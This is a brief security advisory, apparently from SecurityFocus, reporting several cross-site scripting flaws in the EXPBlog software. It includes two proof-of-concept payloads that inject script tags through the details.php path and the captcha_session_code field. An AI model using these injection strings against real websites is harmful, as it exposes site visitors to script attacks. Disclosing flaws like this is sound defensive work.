EXPBlog Multiple Cross-Site Scripting Vulnerabilities

To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.

Proof of concept is available:

1) details.php/%3E%22%3E%3Cscript%3Ealert('Unsecure')%3C/script%3E

2) comment=1&captcha_session_code=>"><script>alert('hole')</script>...


 

Privacy Statement
Copyright 2010, SecurityFocus